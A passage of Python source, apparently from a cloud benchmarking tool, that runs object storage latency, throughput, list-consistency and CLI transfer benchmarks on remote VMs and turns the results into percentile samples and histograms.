this_size_metadata['object_size_B'] = size
logging.info('Processing multi-stream %s results for object size %s',
operation, size)
_AppendPercentilesToResults(
results,
all_active_latencies[all_active_sizes == size],
latency_prefix,
LATENCY_UNIT,
this_size_metadata)
# Record samples for individual downloads and uploads if requested.
if FLAGS.record_individual_latency_samples:
for latency in all_active_latencies[all_active_sizes == size]:
results.append(
sample.Sample('%s individual' % latency_prefix, latency,
LATENCY_UNIT, this_size_metadata))
# Build the object latency histogram if user requested it
if FLAGS.object_storage_latency_histogram_interval and any(
size in x for x in sizes):
histogram_interval = FLAGS.object_storage_latency_histogram_interval
hist_latencies = [[l for l, s in zip(*w_l_s) if s == size]
for w_l_s in zip(latencies, sizes)]
max_latency = max([max(l) for l in hist_latencies])
# Note that int() floors for us
num_histogram_buckets = int(max_latency / histogram_interval) + 1
histogram_buckets = [0 for _ in range(num_histogram_buckets)]
for worker_latencies in hist_latencies:
for latency in worker_latencies:
# Note that int() floors for us
histogram_buckets[int(latency / histogram_interval)] += 1
histogram_str = ','.join([str(c) for c in histogram_buckets])
histogram_metadata = this_size_metadata.copy()
histogram_metadata['interval'] = histogram_interval
histogram_metadata['histogram'] = histogram_str
results.append(sample.Sample(
'Multi-stream %s latency histogram' % operation,
0.0, 'histogram', metadata=histogram_metadata))
# Throughput metrics
total_active_times = [np.sum(latency) for latency in active_latencies]
active_durations = [stop_times[i][active_stop_indexes[i] - 1] -
start_times[i][active_start_indexes[i]]
for i in range(num_streams)]
total_active_sizes = [np.sum(size) for size in active_sizes]
# 'net throughput (with gap)' is computed by taking the throughput
# for each stream (total # of bytes transmitted / (stop_time -
# start_time)) and then adding the per-stream throughputs. 'net
# throughput' is the same, but replacing (stop_time - start_time)
# with the sum of all of the operation latencies for that thread, so
# we only divide by the time that stream was actually transmitting.
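# For example (illustrative numbers only): a stream that moved 100 MB while its
# operations spent a combined 8 s transferring, within a 10 s window between its
# first start and last stop, contributes 100 MB / 8 s to 'net throughput' but
# only 100 MB / 10 s to 'net throughput (with gap)'.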
results.append(sample.Sample(
'Multi-stream ' + operation + ' net throughput',
np.sum((size / active_time * 8
for size, active_time
in zip(total_active_sizes, total_active_times))),
'bit / second', metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' net throughput (with gap)',
np.sum((size / duration * 8
for size, duration in zip(total_active_sizes, active_durations))),
'bit / second', metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' net throughput (simplified)',
sum([np.sum(size) for size in sizes]) /
(last_stop_time - first_start_time) * 8,
'bit / second', metadata=distribution_metadata))
# QPS metrics
results.append(sample.Sample(
'Multi-stream ' + operation + ' QPS (any stream active)',
num_records / (last_stop_time - first_start_time), 'operation / second',
metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' QPS (all streams active)',
len(all_active_latencies) / (first_stop_time - last_start_time),
'operation / second', metadata=distribution_metadata))
# Statistics about benchmarking overhead
gap_time = sum((active_duration - active_time
for active_duration, active_time
in zip(active_durations, total_active_times)))
results.append(sample.Sample(
'Multi-stream ' + operation + ' total gap time',
gap_time, 'second', metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' gap time proportion',
gap_time / (first_stop_time - last_start_time) * 100.0,
'percent', metadata=distribution_metadata))
def _DistributionToBackendFormat(dist):
"""Convert an object size distribution to the format needed by the backend.
Args:
dist: a distribution, given as a dictionary mapping size to
frequency. Size will be a string with a quantity and a
unit. Frequency will be a percentage, including a '%'
character. dist may also be a string, in which case it represents
a single object size which applies to 100% of objects.
Returns:
A dictionary giving an object size distribution. Sizes will be
integers representing bytes. Frequencies will be floating-point
numbers in [0,100], representing percentages.
Raises:
ValueError if dist is not a valid distribution.
"""
if isinstance(dist, dict):
val = {flag_util.StringToBytes(size):
flag_util.StringToRawPercent(frequency)
for size, frequency in six.iteritems(dist)}
else:
# We allow compact notation for point distributions. For instance,
# '1KB' is an abbreviation for '{1KB: 100%}'.
val = {flag_util.StringToBytes(dist): 100.0}
# I'm requiring exact addition to 100, which can always be satisfied
# with integer percentages. If we want to allow general decimal
# percentages, all we have to do is replace this equality check with
# approximate equality.
if sum(six.itervalues(val)) != 100.0:
raise ValueError("Frequencies in %s don't add to 100%%!" % dist)
return val
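# A quick sketch of the conversion above (exact byte counts depend on
# flag_util.StringToBytes, so these are approximate):
#   _DistributionToBackendFormat('1KB')
#       -> {1000: 100.0}                       # point distribution shorthand
#   _DistributionToBackendFormat({'1KB': '50%', '10KB': '50%'})
#       -> {1000: 50.0, 10000: 50.0}           # frequencies must sum to 100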
class APIScriptCommandBuilder(object):
"""Builds command lines for the API test script.
Attributes:
test_script_path: the path to the API test script on the remote machine.
storage: the storage provider to use, in the format expected by
the test script.
service: the ObjectStorageService object corresponding to the
storage provider.
"""
def __init__(self, test_script_path, storage, service):
self.test_script_path = test_script_path
self.storage = storage
self.service = service
def BuildCommand(self, args):
"""Build a command string for the API test script.
Args:
args: a list of strings. These will become space-separated
arguments to the test script.
Returns:
A string that can be passed to vm.RemoteCommand.
"""
cmd_parts = [
self.test_script_path,
'--storage_provider=%s' % self.storage
] + args + self.service.APIScriptArgs()
if FLAGS.object_storage_storage_class is not None:
cmd_parts += ['--object_storage_class',
FLAGS.object_storage_storage_class]
return ' '.join(cmd_parts)
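# As an illustration (assuming the GCS provider and the script path used by
# Run below), a call like
#   command_builder.BuildCommand(['--bucket=my-bucket', '--scenario=OneByteRW'])
# yields roughly
#   '/tmp/run/object_storage_api_tests.py --storage_provider=GCS '
#   '--bucket=my-bucket --scenario=OneByteRW <service.APIScriptArgs()...>'
# with '--object_storage_class <class>' appended when that flag is set.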
class UnsupportedProviderCommandBuilder(APIScriptCommandBuilder):
"""A dummy command builder for unsupported providers.
When a provider isn't supported by the API test script yet, we
create this command builder for it. It lets us run the CLI
benchmark on that provider, but raises an error if the user tries
to run an API benchmark.
Attributes:
provider: the name of the unsupported provider.
"""
def __init__(self, provider):
self.provider = provider
def BuildCommand(self, args):
raise NotImplementedError('API tests are not supported on provider %s.' %
self.provider)
def OneByteRWBenchmark(results, metadata, vm, command_builder,
service, bucket_name):
"""A benchmark for small object latency.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
one_byte_rw_cmd = command_builder.BuildCommand([
'--bucket=%s' % bucket_name,
'--scenario=OneByteRW'])
_, raw_result = vm.RemoteCommand(one_byte_rw_cmd)
logging.info('OneByteRW raw result is %s', raw_result)
for up_and_down in [
MultistreamOperationType.upload, MultistreamOperationType.download
]:
search_string = 'One byte %s - (.*)' % up_and_down
result_string = re.findall(search_string, raw_result)
sample_name = ONE_BYTE_LATENCY % up_and_down
if len(result_string) > 0:
_JsonStringToPercentileResults(results,
result_string[0],
sample_name,
LATENCY_UNIT,
metadata)
else:
raise ValueError('Unexpected test outcome from OneByteRW api test: '
'%s.' % raw_result)
def SingleStreamThroughputBenchmark(results, metadata, vm, command_builder,
service, bucket_name):
"""A benchmark for large object throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
single_stream_throughput_cmd = command_builder.BuildCommand([
'--bucket=%s' % bucket_name,
'--scenario=SingleStreamThroughput'])
_, raw_result = vm.RemoteCommand(single_stream_throughput_cmd)
logging.info('SingleStreamThroughput raw result is %s', raw_result)
for up_and_down in [
MultistreamOperationType.upload, MultistreamOperationType.download
]:
search_string = 'Single stream %s throughput in Bps: (.*)' % up_and_down
result_string = re.findall(search_string, raw_result)
sample_name = SINGLE_STREAM_THROUGHPUT % up_and_down
if not result_string:
raise ValueError('Unexpected test outcome from '
'SingleStreamThroughput api test: %s.' % raw_result)
# Convert bytes per second to megabits per second.
# We use 10^6 bits (not 2^20) to be consistent with network
# bandwidth conventions.
result = json.loads(result_string[0])
for percentile in PERCENTILES_LIST:
results.append(sample.Sample(
('%s %s') % (sample_name, percentile),
8 * float(result[percentile]) / 1000 / 1000,
THROUGHPUT_UNIT,
metadata))
def ListConsistencyBenchmark(results, metadata, vm, command_builder,
service, bucket_name):
"""A benchmark for bucket list consistency.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
list_consistency_cmd = command_builder.BuildCommand([
'--bucket=%s' % bucket_name,
'--iterations=%d' % FLAGS.object_storage_list_consistency_iterations,
'--scenario=ListConsistency'])
_, raw_result = vm.RemoteCommand(list_consistency_cmd)
logging.info('ListConsistency raw result is %s', raw_result)
for scenario in LIST_CONSISTENCY_SCENARIOS:
metric_name = '%s %s' % (scenario, LIST_CONSISTENCY_PERCENTAGE)
search_string = '%s: (.*)' % metric_name
result_string = re.findall(search_string, raw_result)
if not result_string:
raise ValueError(
'Cannot get percentage from ListConsistency test.')
results.append(sample.Sample(
metric_name,
(float)(result_string[0]),
NA_UNIT,
metadata))
# Parse the list inconsistency window if there is any.
metric_name = '%s %s' % (scenario, LIST_INCONSISTENCY_WINDOW)
search_string = '%s: (.*)' % metric_name
result_string = re.findall(search_string, raw_result)
_JsonStringToPercentileResults(results,
result_string[0],
metric_name,
LATENCY_UNIT,
metadata)
# Also report the list latency. These latencies are from the lists
# that were consistent.
metric_name = '%s %s' % (scenario, LIST_LATENCY)
search_string = '%s: (.*)' % metric_name
result_string = re.findall(search_string, raw_result)
_JsonStringToPercentileResults(results,
result_string[0],
metric_name,
LATENCY_UNIT,
metadata)
def LoadWorkerOutput(output):
"""Load output from worker processes to our internal format.
Args:
output: list of strings. The stdouts of all worker processes.
Returns:
A tuple of start_time, latency, size. Each of these is a list of
numpy arrays, one array per worker process. start_time[i],
latency[i], and size[i] together form a table giving the start
time, latency, and size (bytes transmitted or received) of all
send/receive operations for worker i.
start_time holds POSIX timestamps, stored as np.float64. latency
holds times in seconds, stored as np.float64. size holds sizes in
bytes, stored as np.int64.
Example:
start_time[i] latency[i] size[i]
------------- ---------- -------
0.0 0.5 100
1.0 0.7 200
2.3 0.3 100
Raises:
AssertionError, if an individual worker's input includes
overlapping operations, or operations that don't move forward in
time, or if the input list isn't in stream number order.
"""
start_times = []
latencies = []
sizes = []
for worker_out in output:
json_out = json.loads(worker_out)
for stream in json_out:
assert len(stream['start_times']) == len(stream['latencies'])
assert len(stream['latencies']) == len(stream['sizes'])
start_times.append(np.asarray(stream['start_times'], dtype=np.float64))
latencies.append(np.asarray(stream['latencies'], dtype=np.float64))
sizes.append(np.asarray(stream['sizes'], dtype=np.int64))
return start_times, latencies, sizes
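# The worker stdout parsed above is a JSON list with one entry per stream, e.g.
# (made-up numbers):
#   '[{"start_times": [0.0, 1.0], "latencies": [0.5, 0.7], "sizes": [100, 200]}]'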
def _RunMultiStreamProcesses(vms, command_builder, cmd_args, streams_per_vm):
"""Runs all of the multistream read or write processes and doesn't return
until they complete.
Args:
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
cmd_args: arguments for the command_builder.
streams_per_vm: number of threads per vm.
"""
output = [None] * len(vms)
def RunOneProcess(vm_idx):
logging.info('Running on VM %s.', vm_idx)
cmd = command_builder.BuildCommand(cmd_args + [
'--stream_num_start=%s' % (vm_idx * streams_per_vm),
'--vm_id=%s' % vm_idx
])
out, _ = vms[vm_idx].RobustRemoteCommand(cmd, should_log=False)
output[vm_idx] = out
# Each vm/process has a thread managing it.
threads = [
threading.Thread(target=RunOneProcess, args=(vm_idx,))
for vm_idx in range(len(vms))]
for thread in threads:
thread.start()
logging.info('Started %s processes.', len(vms))
# Wait for the threads to finish
for thread in threads:
thread.join()
logging.info('All processes complete.')
return output
def _DatetimeNow():
"""Returns datetime.datetime.now()."""
return datetime.datetime.now()
def _ColdObjectsWrittenFilename():
"""Generates a name for the objects_written_file.
Returns:
The name of the objects_written_file if it should be created, or None.
"""
if FLAGS.object_storage_objects_written_file_prefix:
# Note this format is required by _ColdObjectsWrittenFileAgeHours.
datetime_suffix = _DatetimeNow().strftime('%Y%m%d-%H%M')
return '%s-%s-%s-%s' % (
FLAGS.object_storage_objects_written_file_prefix,
FLAGS.object_storage_region,
uuid.uuid4(), # Add a UUID to support parallel runs that upload data.
datetime_suffix)
return None
def _ColdObjectsWrittenFileAgeHours(filename):
"""Determines the age in hours of an objects_written_file.
Args:
filename: The name of the file.
Returns:
The age of the file in hours (based on the name), or None.
"""
# Parse the year, month, day, hour, and minute from the filename based on the
# way it is written in _ColdObjectsWrittenFilename.
match = re.search(r'(\d\d\d\d)(\d\d)(\d\d)-(\d\d)(\d\d)$', filename)
if not match:
return None
year, month, day, hour, minute = (int(item) for item in match.groups())
write_datetime = datetime.datetime(year, month, day, hour, minute)
write_timedelta = _DatetimeNow() - write_datetime
return write_timedelta.total_seconds() / _SECONDS_PER_HOUR
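# For instance (hypothetical values), with
# --object_storage_objects_written_file_prefix=cold-data and
# --object_storage_region=us-central1, an upload finishing at 2021-06-01 09:30
# produces a file named roughly
#   'cold-data-us-central1-<uuid>-20210601-0930'
# and _ColdObjectsWrittenFileAgeHours later recovers its age from that trailing
# 'YYYYMMDD-HHMM' suffix.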
def _MultiStreamOneWay(results, metadata, vms, command_builder,
service, bucket_name, operation):
"""Measures multi-stream latency and throughput in one direction.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
operation: 'upload' or 'download'
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
objects_written_file = posixpath.join(vm_util.VM_TMP_DIR,
OBJECTS_WRITTEN_FILE)
size_distribution = _DistributionToBackendFormat(
FLAGS.object_storage_object_sizes)
logging.info('Distribution %s, backend format %s.',
FLAGS.object_storage_object_sizes, size_distribution)
streams_per_vm = FLAGS.object_storage_streams_per_vm
num_vms = FLAGS.num_vms
start_time = (
time.time() +
MultiThreadStartDelay(num_vms, streams_per_vm).m_as('second'))
delete_delay = MultiThreadDeleteDelay(num_vms, streams_per_vm)
logging.info('Start time is %s', start_time)
logging.info('Delete delay is %s', delete_delay)
cmd_args = [
'--bucket=%s' % bucket_name,
'--objects_per_stream=%s' % (
FLAGS.object_storage_multistream_objects_per_stream),
'--num_streams=%s' % streams_per_vm,
'--start_time=%s' % start_time,
'--objects_written_file=%s' % objects_written_file]
if operation == MultistreamOperationType.upload:
cmd_args += [
'--object_sizes="%s"' % size_distribution,
'--object_naming_scheme=%s' % FLAGS.object_storage_object_naming_scheme,
'--scenario=MultiStreamWrite']
elif operation == MultistreamOperationType.download:
cmd_args += ['--scenario=MultiStreamRead']
elif operation == MultistreamOperationType.delete:
cmd_args += [
'--scenario=MultiStreamDelete',
'--delete_delay=%s' % delete_delay
]
elif operation == MultistreamOperationType.bulk_delete:
cmd_args += [
'--scenario=MultiStreamDelete', '--bulk_delete=true',
'--delete_delay=%s' % delete_delay
]
else:
raise Exception('Unsupported operation %r: must be one of upload, download, '
'delete, or bulk_delete.' % operation.name)
output = _RunMultiStreamProcesses(vms, command_builder, cmd_args,
streams_per_vm)
start_times, latencies, sizes = LoadWorkerOutput(output)
if FLAGS.object_storage_worker_output:
with open(FLAGS.object_storage_worker_output, 'w') as out_file:
out_file.write(json.dumps(output))
_ProcessMultiStreamResults(
start_times,
latencies,
sizes,
operation.name,
list(six.iterkeys(size_distribution)),
results,
metadata=metadata)
# Write the objects written file if the flag is set and this is an upload
objects_written_path_local = _ColdObjectsWrittenFilename()
if operation == MultistreamOperationType.upload and objects_written_path_local is not None:
# Get the objects written from all the VMs
# Note these are JSON lists with the following format:
# [[object1_name, object1_size],[object2_name, object2_size],...]
outs = vm_util.RunThreaded(
lambda vm: vm.RemoteCommand('cat ' + objects_written_file), vms)
maybe_storage_account = ''
maybe_resource_group = ''
if FLAGS.storage == 'Azure':
maybe_storage_account = '"azure_storage_account": "%s", ' % \
service.storage_account.name
maybe_resource_group = '"azure_resource_group": "%s", ' % \
service.resource_group.name
# Merge the objects written from all the VMs into a single string
objects_written_json = \
'{%s%s"bucket_name": "%s", "objects_written": %s}' % \
(maybe_storage_account, maybe_resource_group, bucket_name,
'[' + ','.join([out for out, _ in outs]) + ']')
# Write the file
with open(objects_written_path_local, 'w') as objects_written_file_local:
objects_written_file_local.write(objects_written_json)
def MultiStreamRWBenchmark(results, metadata, vms, command_builder,
service, bucket_name):
"""A benchmark for multi-stream read/write latency and throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
logging.info('Starting multi-stream write test on %s VMs.', len(vms))
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.upload)
logging.info('Finished multi-stream write test. Starting '
'multi-stream read test.')
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.download)
logging.info('Finished multi-stream read test.')
def MultiStreamWriteBenchmark(results, metadata, vms, command_builder,
service, bucket_name):
"""A benchmark for multi-stream write latency and throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
logging.info('Starting multi-stream write test on %s VMs.', len(vms))
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.upload)
logging.info('Finished multi-stream write test.')
def MultiStreamReadBenchmark(results, metadata, vms, command_builder,
service, bucket_name, read_objects):
"""A benchmark for multi-stream read latency and throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
read_objects: List of lists of [object_name, object_size]. In the outermost
list, each element corresponds to a VM's worker process.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
logging.info('Starting multi-stream read test on %s VMs.', len(vms))
assert read_objects is not None, (
'api_multistream_reads scenario requires the '
'object_storage_read_objects_prefix flag to be set.')
# Send over the objects written file
try:
# Write the per-VM objects-written-files
assert len(read_objects) == len(vms), (
'object_storage_read_objects_prefix file specified requires exactly '
'%d VMs, but %d were provisioned.' % (len(read_objects), len(vms)))
for vm, vm_objects_written in zip(vms, read_objects):
# Note that each file is written with a unique name so that parallel runs
# don't overwrite the same local file. They are pushed to the VM to a file
# named OBJECTS_WRITTEN_FILE.
tmp_objects_written_path = os.path.join(vm_util.GetTempDir(),
'%s-%s' % (OBJECTS_WRITTEN_FILE,
vm.name))
with open(tmp_objects_written_path, 'w') as objects_written_file:
objects_written_file.write(json.dumps(vm_objects_written))
vm.PushFile(tmp_objects_written_path,
posixpath.join(vm_util.VM_TMP_DIR, OBJECTS_WRITTEN_FILE))
except Exception as e:
raise Exception('Failed to upload the objects written files to the VMs: '
'%s' % e)
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.download)
logging.info('Finished multi-stream read test.')
def MultiStreamDelete(results, metadata, vms, command_builder, service,
bucket_name):
"""A benchmark for multi-stream delete.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
logging.info('Starting multi-stream delete test on %s VMs.', len(vms))
if FLAGS.object_storage_bulk_delete:
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.bulk_delete)
else:
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.delete)
logging.info('Finished multi-stream delete test.')
def CheckPrerequisites(benchmark_config):
"""Verifies that the required resources are present.
Args:
benchmark_config: Benchmark config to verify.
Raises:
perfkitbenchmarker.data.ResourceNotFound: On missing resource.
perfkitbenchmarker.errors.Setup.InvalidFlagConfigurationError: On invalid
flags.
"""
del benchmark_config
data.ResourcePath(DATA_FILE)
if FLAGS.object_storage_apply_region_suffix_to_bucket_name:
if not FLAGS.object_storage_region:
raise errors.Setup.InvalidFlagConfigurationError(
'Please specify --object_storage_region if using '
'--object_storage_apply_region_suffix_to_bucket_name.')
def _AppendPercentilesToResults(output_results, input_results, metric_name,
metric_unit, metadata):
# PercentileCalculator will (correctly) raise an exception on empty
# input, but an empty input list makes semantic sense here.
if len(input_results) == 0:
return
percentiles = PercentileCalculator(input_results)
for percentile in PERCENTILES_LIST:
output_results.append(sample.Sample(('%s %s') % (metric_name, percentile),
percentiles[percentile],
metric_unit,
metadata))
def CLIThroughputBenchmark(output_results, metadata, vm, command_builder,
service, bucket):
"""A benchmark for CLI tool throughput.
We will upload and download a set of files from/to a local directory
via cli tools and observe the throughput.
Args:
output_results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
bucket: the primary bucket to benchmark.
Raises:
NotEnoughResultsError: if we failed too many times to upload or download.
"""
data_directory = '/tmp/run/data'
# The real solution to the iteration count issue is dynamically
# choosing the number of iterations based on how long they
# take. This will work for now, though.
if FLAGS.storage == providers.AZURE:
iteration_count = CLI_TEST_ITERATION_COUNT_AZURE
elif FLAGS.cli_test_size == 'normal':
iteration_count = CLI_TEST_ITERATION_COUNT
else:
iteration_count = LARGE_CLI_TEST_ITERATION_COUNT
# The CLI-based tests require some provisioning on the VM first.
vm.RemoteCommand(
'cd /tmp/run/; bash cloud-storage-workload.sh %s' % FLAGS.cli_test_size)
# CLI tool based tests.
cli_upload_results = []
cli_download_results = []
if FLAGS.cli_test_size == 'normal':
data_size_in_mbits = DATA_SIZE_IN_MBITS
file_names = ['file-%s.dat' % i for i in range(100)]
else:
data_size_in_mbits = LARGE_DATA_SIZE_IN_MBITS
file_names = ['file_large_3gib.dat']
for _ in range(iteration_count):
try:
service.EmptyBucket(bucket)
except Exception:
pass
try:
_, res = service.CLIUploadDirectory(vm, data_directory,
file_names, bucket)
except errors.VirtualMachine.RemoteCommandError:
logging.info('failed to upload, skip this iteration.')
continue
throughput = data_size_in_mbits / vm_util.ParseTimeCommandResult(res)
logging.info('cli upload throughput %f', throughput)
cli_upload_results.append(throughput)
try:
vm.RemoveFile(posixpath.join(DOWNLOAD_DIRECTORY, '*'))
except Exception:
pass
try:
_, res = service.CLIDownloadBucket(vm, bucket,
file_names, DOWNLOAD_DIRECTORY)
except errors.VirtualMachine.RemoteCommandError:
logging.info('failed to download, skip this iteration.')
continue
throughput = data_size_in_mbits / vm_util.ParseTimeCommandResult(res)
logging.info('cli download throughput %f', throughput)
cli_download_results.append(throughput)
expected_successes = iteration_count * (1 - CLI_TEST_FAILURE_TOLERANCE)
if (len(cli_download_results) < expected_successes or
len(cli_upload_results) < expected_successes):
raise NotEnoughResultsError('Failed to complete the required number of '
'iterations.')
# Report various percentiles.
metrics_prefix = ''
if FLAGS.cli_test_size != 'normal':
metrics_prefix = '%s ' % FLAGS.cli_test_size
_AppendPercentilesToResults(output_results,
cli_upload_results,
'%s%s' % (metrics_prefix,
UPLOAD_THROUGHPUT_VIA_CLI),
THROUGHPUT_UNIT,
metadata)
_AppendPercentilesToResults(output_results,
cli_download_results,
'%s%s' % (metrics_prefix,
DOWNLOAD_THROUGHPUT_VIA_CLI),
THROUGHPUT_UNIT,
metadata)
def PrepareVM(vm, service):
vm.InstallPackages('python3-pip')
# dependencies of API_TEST_SCRIPT
vm.RemoteCommand('sudo pip3 install absl-py')
vm.RemoteCommand('sudo pip3 install pyyaml')
vm.Install('openssl')
# Prepare data on vm, create a run directory in temporary directory, and add
# permission.
vm.RemoteCommand('sudo mkdir -p ' + SCRIPT_DIR)
vm.RemoteCommand('sudo chmod 777 ' + SCRIPT_DIR)
vm.RemoteCommand('sudo mkdir -p ' + DOWNLOAD_DIRECTORY)
vm.RemoteCommand('sudo chmod 777 ' + DOWNLOAD_DIRECTORY)
vm.RemoteCommand('sudo mkdir -p ' + REMOTE_PACKAGE_DIR)
vm.RemoteCommand('sudo chmod 777 ' + REMOTE_PACKAGE_DIR)
file_path = data.ResourcePath(DATA_FILE)
vm.PushFile(file_path, SCRIPT_DIR)
# push the test script
script_path = data.ResourcePath(
os.path.join(API_TEST_SCRIPTS_DIR, API_TEST_SCRIPT))
vm.PushFile(script_path, '/tmp/run/')
# push the package dependencies of the test script
for file_name in API_TEST_SCRIPT_PACKAGE_FILES + service.APIScriptFiles():
path = data.ResourcePath(
os.path.join(API_TEST_SCRIPTS_DIR, file_name))
logging.info('Uploading %s to %s', path, vm)
vm.PushFile(path, REMOTE_PACKAGE_DIR)
service.PrepareVM(vm)
def CleanupVM(vm, service):
service.CleanupVM(vm)
vm.RemoteCommand('/usr/bin/yes | sudo pip3 uninstall absl-py')
vm.RemoteCommand('sudo rm -rf /tmp/run/')
objects_written_file = posixpath.join(vm_util.VM_TMP_DIR,
OBJECTS_WRITTEN_FILE)
vm.RemoteCommand('rm -f %s' % objects_written_file)
def Prepare(benchmark_spec):
"""Prepare vm with cloud provider tool and prepare vm with data file.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
Raises:
ColdDataError: If this benchmark is reading cold data, but the data isn't
cold enough (as configured by object_storage_read_objects_min_hours).
"""
# We would like to always cleanup server side states when exception happens.
benchmark_spec.always_call_cleanup = True
# Load the objects to read file if specified
benchmark_spec.read_objects = None
if FLAGS.object_storage_read_objects_prefix is not None:
# Take a glob and choose an arbitrary matching file that is old enough, in
# case there is more than one.
search_prefix = '%s-%s*' % (
FLAGS.object_storage_read_objects_prefix,
FLAGS.object_storage_region)
read_objects_filenames = glob.glob(search_prefix)
logging.info('Considering object files %s: %s', search_prefix,
read_objects_filenames)
for filename in read_objects_filenames:
age_hours = _ColdObjectsWrittenFileAgeHours(filename)
if age_hours and age_hours > FLAGS.object_storage_read_objects_min_hours:
read_objects_filename = filename
break
else:
raise ColdDataError(
'Object data older than %d hours does not exist. Current cold data '
'files include the following: %s' % (
FLAGS.object_storage_read_objects_min_hours,
read_objects_filenames))
with open(read_objects_filename) as read_objects_file:
# Format of json structure is:
# {"bucket_name": <bucket_name>,
# ... any other provider-specific context needed
# "objects_written": <objects_written_array>}
benchmark_spec.read_objects = json.loads(read_objects_file.read())
benchmark_spec.read_objects_filename = read_objects_filename
benchmark_spec.read_objects_age_hours = age_hours
# When this benchmark reads these files, the data will be deleted. Delete
# the file that specifies the data too.
if not FLAGS.object_storage_dont_delete_bucket:
os.remove(read_objects_filename)
assert benchmark_spec.read_objects is not None, (
'Failed to read the file specified by '
'--object_storage_read_objects_prefix')
# Load the provider and its object storage service
providers.LoadProvider(FLAGS.storage)
# Determine the bucket name.
if benchmark_spec.read_objects is not None:
# Using an existing bucket
bucket_name = benchmark_spec.read_objects['bucket_name']
if FLAGS.object_storage_bucket_name is not None:
logging.warning('--object_storage_bucket_name ignored because '
'--object_storage_read_objects_prefix was specified')
else:
# Use a new bucket (or the name of a specified bucket).
bucket_name = FLAGS.object_storage_bucket_name or 'pkb%s' % FLAGS.run_uri
if FLAGS.object_storage_apply_region_suffix_to_bucket_name:
# Avoid non-alphanumeric characters in the region as bucket names on some
# clouds cannot contain non-alphanumeric characters.
bucket_name = '%s%s' % (bucket_name,
re.sub(r'[\W_]', '', FLAGS.object_storage_region))
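# For example, with --object_storage_region=us-central1 the suffix becomes
# 'uscentral1', so a bucket name of 'pkb<run_uri>' ends up as
# 'pkb<run_uri>uscentral1'.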
service = object_storage_service.GetObjectStorageClass(FLAGS.storage)()
if (FLAGS.storage == 'Azure' and
FLAGS.object_storage_read_objects_prefix is not None):
# Storage provider is azure and we are reading existing objects.
# Need to prepare the ObjectStorageService with the existing storage
# account and resource group associated with the bucket containing our
# objects
service.PrepareService(
FLAGS.object_storage_region,
# On Azure, use an existing storage account if we
# are reading existing objects
(benchmark_spec.read_objects['azure_storage_account'],
benchmark_spec.read_objects['azure_resource_group']))
elif FLAGS.storage == 'Azure' and FLAGS.object_storage_bucket_name:
# We are using a bucket that may exist from a previous run. We should use
# a storage account and resource group for this bucket based on the same
# name (for consistency).
service.PrepareService(
FLAGS.object_storage_region,
# The storage account must not exceed 24 characters.
(bucket_name[:24], bucket_name + '-resource-group'),
try_to_create_storage_account_and_resource_group=True)
else:
service.PrepareService(FLAGS.object_storage_region)
vms = benchmark_spec.vms
vm_util.RunThreaded(lambda vm: PrepareVM(vm, service), vms)
# Make the bucket.
if benchmark_spec.read_objects is None:
# Fail if we cannot create the bucket, unless the bucket name was set via a
# flag. If it was set by a flag, we will still try to create the bucket, but
# won't fail if it already exists. This supports running the benchmark on the
# same bucket multiple times.
raise_on_bucket_creation_failure = not FLAGS.object_storage_bucket_name
if FLAGS.storage == 'GCP' and FLAGS.object_storage_gcs_multiregion:
# Use a GCS multiregional bucket
multiregional_service = gcs.GoogleCloudStorageService()
multiregional_service.PrepareService(FLAGS.object_storage_gcs_multiregion
or DEFAULT_GCS_MULTIREGION)
multiregional_service.MakeBucket(
